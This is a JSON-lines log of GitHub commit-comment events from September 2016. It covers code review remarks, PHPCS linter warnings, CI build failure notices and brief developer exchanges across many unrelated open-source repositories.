{"id":"4508643878","type":"CommitCommentEvent","actor":{"login":"fheslouin"},"repo":{"name":"ideascube/ansiblecube"},"payload":{"comment":{"id":18880621,"position":12,"line":425,"path":"roles/set_custom_fact/files/device_list.fact","commit_id":"56330b5361ab7a8b9ce43b124c54c152c0bbb144","created_at":"2016-09-02T13:55:59Z","updated_at":"2016-09-02T13:55:59Z","body":"This entry is made to download the ZIM from Internet. In you case you are going to copy the ZIM from an other device"}},"created_at":"2016-09-02T13:55:59Z"}
{"id":"4508643927","type":"CommitCommentEvent","actor":{"login":"escardin"},"repo":{"name":"auth0/angular2-jwt"},"payload":{"comment":{"id":18880622,"position":5,"line":10,"path":"angular2-jwt.spec.ts","commit_id":"4e85b828b36b322482c2a4e8e46e58172016adcc","created_at":"2016-09-02T13:56:00Z","updated_at":"2016-09-02T13:56:00Z","body":"Why did you replace a valid token with an invalid one?"}},"created_at":"2016-09-02T13:56:00Z"}
{"id":"4508645438","type":"CommitCommentEvent","actor":{"login":"jdobes"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":18880631,"position":null,"line":null,"path":null,"commit_id":"435304b632488e6c89bcb2a6ad8b6f8b8b42e88f","created_at":"2016-09-02T13:56:18Z","updated_at":"2016-09-02T13:56:18Z","body":"Hello,\r\nit should be fixed in d75ac71f940866c3b51bfa22cd8fb1272fede3cf"}},"created_at":"2016-09-02T13:56:18Z"}
{"id":"4508645700","type":"CommitCommentEvent","actor":{"login":"NikEfth"},"repo":{"name":"NikEfth/STIR"},"payload":{"comment":{"id":18880632,"position":null,"line":null,"path":null,"commit_id":"e73b4ee5c1bad033dc35a0bc9813004605e3cd36","created_at":"2016-09-02T13:56:21Z","updated_at":"2016-09-02T13:56:21Z","body":"@KrisThielemans\r\n\r\nHow does this look to you? \r\nIt works with Cylindical scanners and (after the weekend) \r\nI will support ecat scanners. \r\n\r\nI don't PR in order to avoid Travis. :/"}},"created_at":"2016-09-02T13:56:21Z"}
{"id":"4508653528","type":"CommitCommentEvent","actor":{"login":"jerrinot"},"repo":{"name":"jerrinot/hazelcast"},"payload":{"comment":{"id":18880647,"position":32,"line":287,"path":"hazelcast-client/src/main/java/com/hazelcast/client/connection/nio/ClientConnectionManagerImpl.java","commit_id":"db22f084face949551dcd05a6dc3afbf899fab54","created_at":"2016-09-02T13:57:49Z","updated_at":"2016-09-02T13:57:49Z","body":"this is a behavior change, but having ISE thrown just from this single variant of `getConnection()` seems to be just an inconsistency. "}},"created_at":"2016-09-02T13:57:49Z"}
{"id":"4508653628","type":"CommitCommentEvent","actor":{"login":"ardaozkal"},"repo":{"name":"gamejolt/dmca"},"payload":{"comment":{"id":18880648,"position":null,"line":null,"path":null,"commit_id":"bd4da58d7fc7057dd2552f61c368c12b2905c838","created_at":"2016-09-02T13:57:50Z","updated_at":"2016-09-02T13:57:50Z","body":":( Sad news."}},"created_at":"2016-09-02T13:57:50Z"}
{"id":"4508656219","type":"CommitCommentEvent","actor":{"login":"alisum"},"repo":{"name":"valera5505/SPbU"},"payload":{"comment":{"id":18880655,"position":null,"line":null,"path":null,"commit_id":"a57023d471090e2f763f71aeb03cae435ec3be74","created_at":"2016-09-02T13:58:17Z","updated_at":"2016-09-02T13:58:17Z","body":"hell"}},"created_at":"2016-09-02T13:58:17Z"}
{"id":"4508664257","type":"CommitCommentEvent","actor":{"login":"AuneAbbas"},"repo":{"name":"HotStudio/touchy"},"payload":{"comment":{"id":18880669,"position":5,"line":5,"path":"test-pages/swipe-n-scroll.html","commit_id":"879120e76afbeb324290a7ffb42c6d66e97f434f","created_at":"2016-09-02T13:59:45Z","updated_at":"2016-09-02T13:59:45Z","body":"pri0gpjitwl"}},"created_at":"2016-09-02T13:59:45Z"}
{"id":"4508670936","type":"CommitCommentEvent","actor":{"login":"MerryMage"},"repo":{"name":"MerryMage/dynarmic"},"payload":{"comment":{"id":18880685,"position":null,"line":null,"path":null,"commit_id":"519c714dbc4862d923460738c2a785fe876a9cb8","created_at":"2016-09-02T14:00:52Z","updated_at":"2016-09-02T14:00:52Z","body":"Due to outdated version of XCode on travis; will revert."}},"created_at":"2016-09-02T14:00:52Z"}
{"id":"4508675796","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18880700,"position":null,"line":null,"path":null,"commit_id":"761281f70ca82a83174d0d50ce57155bd33f75f5","created_at":"2016-09-02T14:01:38Z","updated_at":"2016-09-02T14:01:38Z","body":"True, I somehow thought I've made this change in some security release. Anyway it makes sense, so I've made the change to use POST for logout in 4852e9b070fa516e4b5cffc69c98f22913823c55."}},"created_at":"2016-09-02T14:01:38Z"}
{"id":"4508680169","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880715,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:22Z","updated_at":"2016-09-02T14:02:22Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T14:02:22Z"}
{"id":"4508680221","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880716,"position":19,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:22Z","updated_at":"2016-09-02T14:02:22Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T14:02:22Z"}
{"id":"4508681950","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880722,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:41Z","updated_at":"2016-09-02T14:02:41Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T14:02:41Z"}
{"id":"4508681987","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880723,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:41Z","updated_at":"2016-09-02T14:02:41Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T14:02:41Z"}
{"id":"4508682042","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880725,"position":5,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:42Z","updated_at":"2016-09-02T14:02:42Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T14:02:42Z"}
{"id":"4508682079","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880726,"position":11,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:42Z","updated_at":"2016-09-02T14:02:42Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T14:02:42Z"}
{"id":"4508682120","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880727,"position":17,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:43Z","updated_at":"2016-09-02T14:02:43Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T14:02:43Z"}
{"id":"4508682540","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880728,"position":20,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:02:48Z","updated_at":"2016-09-02T14:02:48Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T14:02:48Z"}
{"id":"4508690481","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18880741,"position":null,"line":null,"path":null,"commit_id":"ca61bcedb2488a6291ca8c8e53a7ba436fc310e9","created_at":"2016-09-02T14:04:14Z","updated_at":"2016-09-02T14:04:14Z","body":"Relacionado: https://github.com/chamilo/chamilo-lms/commit/048fbfd3bc9fb8295540d2aca55331391acc9df4"}},"created_at":"2016-09-02T14:04:14Z"}
{"id":"4508690873","type":"CommitCommentEvent","actor":{"login":"kylecordes"},"repo":{"name":"kylecordes/rc6AOT"},"payload":{"comment":{"id":18880742,"position":14,"line":14,"path":"app/tsconfig.json","commit_id":"8fee7d1725db8b5e272a838409d9c56bc1edd2c9","created_at":"2016-09-02T14:04:18Z","updated_at":"2016-09-02T14:04:18Z","body":"I put this here because I was trying to make the compile work with Jasmine types. Realized it was pointless and removed the tests, they are related to the problem at hand. I should have removed this bit of configuration also.\r\n\r\n"}},"created_at":"2016-09-02T14:04:18Z"}
{"id":"4508691784","type":"CommitCommentEvent","actor":{"login":"aembler"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":18880745,"position":17,"line":93,"path":"concrete/src/Attribute/Controller.php","commit_id":"75e5da3317b8700459265e0ff56f4a22f49bb957","created_at":"2016-09-02T14:04:27Z","updated_at":"2016-09-02T14:04:27Z","body":"hah, just noticed that myself. thanks. I blame PHPstorm window focusing when I'm typing somewhere else. "}},"created_at":"2016-09-02T14:04:27Z"}
{"id":"4508694097","type":"CommitCommentEvent","actor":{"login":"kylecordes"},"repo":{"name":"kylecordes/rc6AOT"},"payload":{"comment":{"id":18880756,"position":7,"line":7,"path":"app/tsconfig.json","commit_id":"8fee7d1725db8b5e272a838409d9c56bc1edd2c9","created_at":"2016-09-02T14:04:54Z","updated_at":"2016-09-02T14:04:54Z","body":"New typescript needs to be told about this kind of thing. Without it, typescript spews out a bunch of errors if code tries to talk about ES6 built-ins.\r\n\r\n"}},"created_at":"2016-09-02T14:04:54Z"}
{"id":"4508702638","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18880773,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-02T14:06:31Z","updated_at":"2016-09-02T14:06:31Z","body":"Hi Brady,\n\nThis is Kevin’s menu, I just added a little css.  I could never write such beautiful code.\nI am sure there is a way to add this caret.  I am looking at the code and find I need to learn about Smarty to add this in.\n\nIMHO a good menu should be intuitive, follow a common, standard structure, have graphical indications of what is happening and be an aid to the user’s workflows.  I think the caret is the tip of the iceberg.  In the Eye Form menu, I use the right side of a menu item for icons, or images or keyboard shortcuts to help the end user.  That menu has what I consider a more standardized structure, containing core menu headings like:\n\nIdentifier (OpenEMR/Eye Form/Encounters etc)  — File Edit View \n\nand then specific items pertinent to the workflows at hand\n\netc.\n\nI contacted https://pixelarity.com/ <https://pixelarity.com/> to see if they would be willing to donate a theme or even built something for us.  We’ll see what they say.\nTheir interfaces and styles are nothing short of breathtaking…\n\nRay\n\n\n> On Sep 2, 2016, at 6:54 AM, Brady Miller <notifications@github.com> wrote:\n> \n> Your menu is looking really nice on the demo! wow.\n> Something that would be nice is to know when a menu item expands to another menu, for example placing the following small icon justified to the right of the menu item that will expand:\n> http://fontawesome.io/icon/caret-right/ <http://fontawesome.io/icon/caret-right/>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/ophthal/openEMR_2/commit/37668908f9234db55ff04fb22e3d17b8c7114488#commitcomment-18878439>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAfDcLVkiFcQPUCWcpsU6lNbMj_SECZYks5qmABpgaJpZM4Jzl32>.\n> \n\n"}},"created_at":"2016-09-02T14:06:31Z"}
{"id":"4508703187","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18880775,"position":null,"line":null,"path":null,"commit_id":"ca61bcedb2488a6291ca8c8e53a7ba436fc310e9","created_at":"2016-09-02T14:06:37Z","updated_at":"2016-09-02T14:06:37Z","body":"Fix https://github.com/chamilo/chamilo-lms/commit/8a9b6748ccf0c5aa2f614b582239647b84efc28f"}},"created_at":"2016-09-02T14:06:37Z"}
{"id":"4508703384","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18880776,"position":27,"line":30,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-02T14:06:40Z","updated_at":"2016-09-02T14:06:40Z","body":"Ok. Well the point was not that it is unsafe (to modify the arguments [I am not sure what you mean by that)] but just introducing some exceptions, and if you want to use the input later, I think it's not possible that way I guess? As you said, we don't want to end up modifying too many arguments, but I looked at it again and I think it is actually fine in this case, you are right.\r\nWell we can change all to _ (if it is not too much of work), I also prefer this approach. What about the `<-` instead of `=`? "}},"created_at":"2016-09-02T14:06:40Z"}
{"id":"4508705602","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18880780,"position":null,"line":null,"path":null,"commit_id":"a9246b07c49c56cb8bf970dcb41d97a02fb0cf73","created_at":"2016-09-02T14:07:03Z","updated_at":"2016-09-02T14:07:03Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.261.1409b0c4ce4435bf2ef798a8f3ed0fca6e99ca56](http://build.palaso.org/viewLog.html?buildId=76400&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Compilation error: src\\LibChorus\\LibChorus.csproj (new) Build time: 00:00:47"}},"created_at":"2016-09-02T14:07:03Z"}
{"id":"4508708133","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18880784,"position":null,"line":null,"path":null,"commit_id":"a9246b07c49c56cb8bf970dcb41d97a02fb0cf73","created_at":"2016-09-02T14:07:31Z","updated_at":"2016-09-02T14:07:31Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.664.1409b0c4ce4435bf2ef798a8f3ed0fca6e99ca56](http://build.palaso.org/viewLog.html?buildId=76401&buildTypeId=bt323) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:27"}},"created_at":"2016-09-02T14:07:31Z"}
{"id":"4508709306","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"jaymedavis/stripe.net"},"payload":{"comment":{"id":18880788,"position":null,"line":null,"path":null,"commit_id":"d44439ea2bfc3266c543368c397531cb657599af","created_at":"2016-09-02T14:07:44Z","updated_at":"2016-09-02T14:07:44Z","body":"Is there going to be a new release for this ?"}},"created_at":"2016-09-02T14:07:44Z"}
{"id":"4508712677","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880793,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:20Z","updated_at":"2016-09-02T14:08:20Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T14:08:20Z"}
{"id":"4508712719","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880794,"position":19,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:21Z","updated_at":"2016-09-02T14:08:21Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T14:08:21Z"}
{"id":"4508714732","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880797,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:41Z","updated_at":"2016-09-02T14:08:41Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T14:08:41Z"}
{"id":"4508714795","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880798,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:41Z","updated_at":"2016-09-02T14:08:41Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T14:08:41Z"}
{"id":"4508714858","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880799,"position":5,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:42Z","updated_at":"2016-09-02T14:08:42Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T14:08:42Z"}
{"id":"4508714936","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880800,"position":11,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:42Z","updated_at":"2016-09-02T14:08:42Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T14:08:42Z"}
{"id":"4508714981","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880801,"position":17,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:43Z","updated_at":"2016-09-02T14:08:43Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T14:08:43Z"}
{"id":"4508715040","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18880802,"position":14,"line":892,"path":"src/common/common.h","commit_id":"3533997873869a44932bb0c3f8ce42c0cc5043f3","created_at":"2016-09-02T14:08:43Z","updated_at":"2016-09-02T14:08:43Z","body":"This specific feature, final, could be as I done with \"override\", just use it as \"final\", as for non-conforming compiler defined as nothing.\r\n\r\n@AlexPeshkoff for the others features, compilers not supporting the subset we blessed, will not work for sure."}},"created_at":"2016-09-02T14:08:43Z"}
{"id":"4508715439","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880804,"position":20,"line":null,"path":"src/Orm.php","commit_id":"c599b3f01c77a785c3cbd9a1773bb5f0317cdb31","created_at":"2016-09-02T14:08:48Z","updated_at":"2016-09-02T14:08:48Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T14:08:48Z"}
{"id":"4508718198","type":"CommitCommentEvent","actor":{"login":"cascremers"},"repo":{"name":"tamarin-prover/tamarin-prover"},"payload":{"comment":{"id":18880808,"position":null,"line":null,"path":null,"commit_id":"090b1c1b792fbe49a1c1fdfd6a3463dbd200433e","created_at":"2016-09-02T14:09:18Z","updated_at":"2016-09-02T14:09:18Z","body":"The problem with this solution is that it no longer works with the older API. There are two obvious fixes:\r\n\r\n  1. Explicitly check for the pydot version number and adapt accordingly.\r\n  2. [Quick hack] *if* the result R of graph_from_dot_file is a list, set G = R[0], otherwise G = R.\r\n\r\n"}},"created_at":"2016-09-02T14:09:18Z"}
{"id":"4508720570","type":"CommitCommentEvent","actor":{"login":"edigiacomo"},"repo":{"name":"ARPA-SIMC/arkimet"},"payload":{"comment":{"id":18880814,"position":null,"line":null,"path":null,"commit_id":"c9e282d0e62a6de517b836d367c98ce1a66e9366","created_at":"2016-09-02T14:09:45Z","updated_at":"2016-09-02T14:09:45Z","body":"C'è un errore nel messaggio: è riferito a #42 "}},"created_at":"2016-09-02T14:09:45Z"}
{"id":"4508723172","type":"CommitCommentEvent","actor":{"login":"slpopejoy"},"repo":{"name":"ekmett/bound"},"payload":{"comment":{"id":18880818,"position":null,"line":null,"path":null,"commit_id":"5498605efafcacb6091453b3f2be7d934aedec75","created_at":"2016-09-02T14:10:15Z","updated_at":"2016-09-02T14:10:15Z","body":"Any chance we can get 1.0.8 on hackage (for the new transformers)? Seems like 2.0 is a bigger change. If I can help with this let me know."}},"created_at":"2016-09-02T14:10:15Z"}
{"id":"4508729772","type":"CommitCommentEvent","actor":{"login":"maxcool73"},"repo":{"name":"maxcool73/exchange"},"payload":{"comment":{"id":18880840,"position":null,"line":null,"path":null,"commit_id":"bdb777408177b96ed5c9a2938354218284ba177a","created_at":"2016-09-02T14:11:28Z","updated_at":"2016-09-02T14:11:28Z","body":"1"}},"created_at":"2016-09-02T14:11:28Z"}
{"id":"4508732348","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"particlebanana/machinepack-mailgun"},"payload":{"comment":{"id":18880844,"position":13,"line":108,"path":"machines/send-html-email.js","commit_id":"7cc71ea39ae12da9a8d4fdaef04ba959b286fa7b","created_at":"2016-09-02T14:11:56Z","updated_at":"2016-09-02T14:11:56Z","body":"@sgress454 let's do this as an optional input instead (esp. since this is in stdlib).  This way, the only `env` variables we ever have to worry about are runner/habitat-specific (e.g. `req`, `res`, `sails`)"}},"created_at":"2016-09-02T14:11:56Z"}
{"id":"4508735128","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"Veiter/thinksns"},"payload":{"comment":{"id":18880853,"position":null,"line":null,"path":null,"commit_id":"866919ba5f67b6f8667f2304b0e8e06f7c3d20b3","created_at":"2016-09-02T14:12:24Z","updated_at":"2016-09-02T14:12:24Z","body":"什么错误？截图看下～"}},"created_at":"2016-09-02T14:12:24Z"}
{"id":"4508738183","type":"CommitCommentEvent","actor":{"login":"awoods"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18880860,"position":null,"line":null,"path":null,"commit_id":"2fe54993bb9ab6c87a6e30c98ab6a987d8de7564","created_at":"2016-09-02T14:12:57Z","updated_at":"2016-09-02T14:12:57Z","body":"This looks good to me if your testing of it, @ruebot, demonstrates correctness."}},"created_at":"2016-09-02T14:12:57Z"}
{"id":"4508744640","type":"CommitCommentEvent","actor":{"login":"vigiljose"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18880880,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T14:14:10Z","updated_at":"2016-09-02T14:14:10Z","body":"Thank you CvH, in my case I get pixeling above 10% of total cpu (far away even from the 50%), that's was sounds strange to me. In your case, above which percentage do you get pixeling? (with or without hardware compression)\r\n\r\nIn the past, I used to have a Gentoo running as a Virtual Machine over Vmware Fusion (running on OSX), with tvheadend 3.9 (with transcoding) and I never had these kind of issues. Actually I still have it, and I was doing some performance tests yesterday. I was above 50% of total available CPU, 3 simultaneous clients with software transcoding (H264), using 720 pixels and 1,5Mbps->no pixeling at all. \r\n\r\nI kwow there were many changes in the app from that version to the current one, but it sounds strange that after all those changes the transcoding performance is worse now that in the past. (and don't forget that in the past I used a VM, and now gentoo is installed natively on the same mac mini). I need to understand if this is happening only to me or if it's a well known issue.\r\n\r\nIf you could do a quick test to identify the maximum CPU befor pixeling starts in your setup, could be a good reference for me (with or without hw transcoding)\r\n\r\nThank you for your big help.\r\nReally appreciate it.\r\n\r\nJose\r\n"}},"created_at":"2016-09-02T14:14:10Z"}
{"id":"4508745551","type":"CommitCommentEvent","actor":{"login":"ruebot"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18880888,"position":null,"line":null,"path":null,"commit_id":"2fe54993bb9ab6c87a6e30c98ab6a987d8de7564","created_at":"2016-09-02T14:14:18Z","updated_at":"2016-09-02T14:14:18Z","body":"@awoods pulling down, and testing again!"}},"created_at":"2016-09-02T14:14:18Z"}
{"id":"4508747070","type":"CommitCommentEvent","actor":{"login":"vladimir-iliev"},"repo":{"name":"mcb30/odoo"},"payload":{"comment":{"id":18880893,"position":null,"line":null,"path":null,"commit_id":"3dbdbe6969685cc8043cf7a4bb6425841d7bb6b9","created_at":"2016-09-02T14:14:34Z","updated_at":"2016-09-02T14:14:34Z","body":"Ah, yes, you're right. Sorry for the noise!"}},"created_at":"2016-09-02T14:14:34Z"}
{"id":"4508747084","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880894,"position":null,"line":null,"path":null,"commit_id":"0dd5b0eb1315a11ab22cc8dcbe108b27eb4c7b71","created_at":"2016-09-02T14:14:34Z","updated_at":"2016-09-02T14:14:34Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:34Z"}
{"id":"4508747095","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880895,"position":null,"line":null,"path":null,"commit_id":"fa6a3c64cd0a3aeddfd79ce2b33025872e0afd0f","created_at":"2016-09-02T14:14:35Z","updated_at":"2016-09-02T14:14:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:35Z"}
{"id":"4508747172","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880896,"position":null,"line":null,"path":null,"commit_id":"b97feb73ef193a8e156ba8d700fe1c5cd904d7cb","created_at":"2016-09-02T14:14:35Z","updated_at":"2016-09-02T14:14:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:35Z"}
{"id":"4508747214","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880897,"position":null,"line":null,"path":null,"commit_id":"1ee71d16f4d0024dc5563103413662477cc0ca76","created_at":"2016-09-02T14:14:36Z","updated_at":"2016-09-02T14:14:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:36Z"}
{"id":"4508747229","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880898,"position":null,"line":null,"path":null,"commit_id":"a56a019f443ff39b68ded9fd6eb8b11f29cc616f","created_at":"2016-09-02T14:14:36Z","updated_at":"2016-09-02T14:14:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:36Z"}
{"id":"4508747240","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880899,"position":null,"line":null,"path":null,"commit_id":"089dc2afb5a1e27e5129166439cb199f1cd669ba","created_at":"2016-09-02T14:14:36Z","updated_at":"2016-09-02T14:14:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:36Z"}
{"id":"4508747275","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880900,"position":null,"line":null,"path":null,"commit_id":"5d8a76193b0838df5ac0c9e7e911b470bdb62810","created_at":"2016-09-02T14:14:36Z","updated_at":"2016-09-02T14:14:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:36Z"}
{"id":"4508748007","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18880901,"position":null,"line":null,"path":null,"commit_id":"2e15941efbee753bc33750db87a754b57eb55512","created_at":"2016-09-02T14:14:45Z","updated_at":"2016-09-02T14:14:45Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=63)"}},"created_at":"2016-09-02T14:14:45Z"}
{"id":"4508748585","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18880905,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T14:14:51Z","updated_at":"2016-09-02T14:14:51Z","body":"а что будет, если выполнить \" a b c d e f\".split()"}},"created_at":"2016-09-02T14:14:51Z"}
{"id":"4508751300","type":"CommitCommentEvent","actor":{"login":"OsvaldoCabral"},"repo":{"name":"BootsTrapSENAI/Bootstrap"},"payload":{"comment":{"id":18880910,"position":null,"line":null,"path":null,"commit_id":"9202aaf4ba0f07a38d6c768b9bf3b872fcf3d174","created_at":"2016-09-02T14:15:23Z","updated_at":"2016-09-02T14:15:23Z","body":"q agy"}},"created_at":"2016-09-02T14:15:23Z"}
